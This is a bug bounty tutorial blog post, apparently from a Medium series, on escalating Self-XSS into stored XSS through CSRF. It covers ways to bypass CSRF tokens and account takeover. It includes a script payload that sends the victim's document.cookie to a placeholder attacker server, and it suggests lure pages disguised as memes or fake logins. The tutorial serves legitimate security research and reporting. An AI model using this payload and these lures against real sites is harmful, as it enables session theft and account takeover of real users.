Self-XSS is often ignored. CSRF is often rated low. But combine them, and you create an automated, high-severity attack chain that programs can't ignore. Here's the exact methodology.

Free Link

Welcome back to the Bug Bounty Bootcamp. You've learned about individual vulnerabilities: XSS that only affects you (Self-XSS), and CSRF that forges actions. Now, we reach a pivotal skill that separates intermediate hunters from advanced strategists: vulnerability chaining. A Self-XSS alone is often dismissed. A CSRF on a non-critical action might be medium severity. But chain them together, and you create a weaponized exploit that can silently compromise other users. This guide will show you the systematic process of escalating a Self-XSS using CSRF, turning two modest findings into one critical report.

The Problem: Why "Self-XSS" is a Dead End (Alone)

A Self-XSS is a cross-site scripting vulnerability that requires the victim to manually input the malicious payload into their own browser. For example, you find that the "Bio" field on a social profile executes JavaScript, but only when you type it into your own profile editor.

The Reality: Most bug bounty programs do not accept Self-XSS reports because there's no clear way for an attacker to exploit another user without their direct, suspicious interaction. It's considered a user-assisted flaw. The hunter's challenge is to find a delivery mechanism.

The Solution: CSRF as the Delivery Vehicle

This is where CSRF becomes your best friend. If you can forge a request, you can make a victim's browser automatically inject the XSS payload into their own profile — without them ever seeing or typing a script.

The Attack Chain:

  1. Find a Self-XSS: Discover an input (like a profile bio, status, or nickname) that executes JavaScript when submitted.
  2. Find a Missing CSRF Protection: On the same form or endpoint, confirm the action lacks proper CSRF tokens or that the tokens can be bypassed (using the techniques from the previous lesson).
  3. Forge the Injection: Create a CSRF attack that, when triggered by a victim, automatically submits a request containing the XSS payload into their own vulnerable field.
  4. The Payload Executes: The XSS is now stored in the victim's profile. Every time they (or potentially anyone who views their profile) loads the page, your script runs in their context.

You have now transformed a Self-XSS into a Stored XSS with a reliable delivery mechanism.

Step-by-Step: The Hunter's Methodology for the Chain

Let's walk through the process detailed in the course material.

Phase 1: Confirm the Self-XSS and Analyze the Form

  1. Locate the Input: Find a POST request that reflects and executes your input. In the lab, it was a form sending data to /post.
  2. Verify Self-XSS: Confirm the payload (e.g., <u>test123</u> or <img src=x onerror=alert(1)>) only fires when you submit it via the actual form. This is your vulnerable "sink."

Phase 2: Break the CSRF Protection on That Form

This is the critical investigative work. The request will likely have a CSRF token. Your job is to break its validation.

The Token Analysis Checklist (from the course):

  1. Remove the Token Parameter Entirely: Delete the entire csrf_token=value from the request. Resend. Does the action still succeed? If YES, the token is not validated—this is the easiest win.
  2. Send an Empty Token: Keep the parameter but make its value empty: csrf_token=. Does it fail? This checks for mere parameter presence vs. actual validation.
  3. Decode and Analyze: If the token looks like base64 (e.g., e3F5dzEyM...), decode it. The example showed a token containing a JSON object like {"user":"admin","sig":"..."}. While the signature may be secure, you're looking for obvious flaws like an easily guessed user_id.
  4. Test for Token Reusability (Across Users): The gold standard test. Create two test accounts. Capture a CSRF token from User A. Use it in a request from User B's session. If it works, tokens are not user-bound, and you can forge requests for any user.
None
None
https://portswigger.net/burp/documentation/desktop/images/getting-started/quick-start-pro-add-to-cart.png

Phase 3: Craft the Weaponized Exploit

Once you confirm the CSRF flaw, you build the delivery mechanism.

  1. Build the CSRF PoC: Use your proxy's "Generate CSRF PoC" feature or write the HTML manually. The form must:
  • Action: Target the vulnerable endpoint (e.g., /profile/update_bio).
  • Method: Match the request (POST).
  • Inputs: Include all required parameters. Crucially, one parameter's value will be your XSS payload (e.g., bio=<script>fetch('https://your-server.com?c='+document.cookie)</script>).

2. Create the Lure: Host this HTML page on a server you control. The page could be disguised as anything: a "Click to see a funny meme" link, a fake login portal, or embedded in a forum post.

The Result: When a logged-in victim visits your page, the hidden form auto-submits. Their browser silently sends a request to the target site, injecting the XSS payload into their own profile. The Self-XSS is now stored on their account.

None

Impact: From Low to Critical Severity

By chaining these flaws, you dramatically increase the severity:

  • Self-XSS Alone: Low/Informational (if accepted at all).
  • CSRF on Bio Update Alone: Medium (data modification).
  • CSRF + Self-XSS Chain: High/Critical. You've demonstrated the ability to silently compromise any user's account by stealing their session cookies or performing actions as them. This is effectively Account Takeover (ATO).

Your Action Plan for Finding Chains

  1. Never Dismiss Self-XSS: When you find one, immediately ask: "How can I deliver this payload to another user?"
  2. Immediately Test for CSRF: On the very same endpoint where the Self-XSS occurs, run the CSRF token validation checklist.
  3. Think About Stored vs. Reflected: Is the XSS stored (in a profile, comment) or reflected (in a search result)? CSRF chains best with stored actions, as the payload persists.
  4. Document the Chain Clearly: In your report, meticulously document both vulnerabilities individually and then demonstrate the combined exploit. Show the token analysis, provide the full PoC code, and explain the escalated impact.

Mastering this chain is a game-changer. It proves you understand not just how to find bugs, but how an attacker would operationalize them in the real world. You're not just reporting flaws; you're demonstrating a concrete path to compromise.

you can check this article too…

List: Bug Bounty Bootcamp | Curated by Aman Sharma | Medium

Bug Bounty Bootcamp · 15 stories on Medium

medium.com

“Bug Bounty Bootcamp #21: CSRF in Action — From Theory to Weaponized Proof-of-Concept”

Finding a missing CSRF token is just the start. Learn the exact methodology to build a malicious form, test it across…

osintteam.blog

$ Don’t Leave Money on the Table: My Automated Hunt for $50-$500 Info Disclosure Bugs 🕵️‍♂️💸 L

t’s be honest: we all dream of the big RCE. But while you’re chasing that unicorn, there’s a steady stream of…in

infosecwriteups.com

Clap 50 times for this story Leave a comment telling me your thoughts Highlight your Favorite part of the story These tiny actions go a long way, and I really appreciate it.

Thank you for reading and for helping me grow this community!

Medium!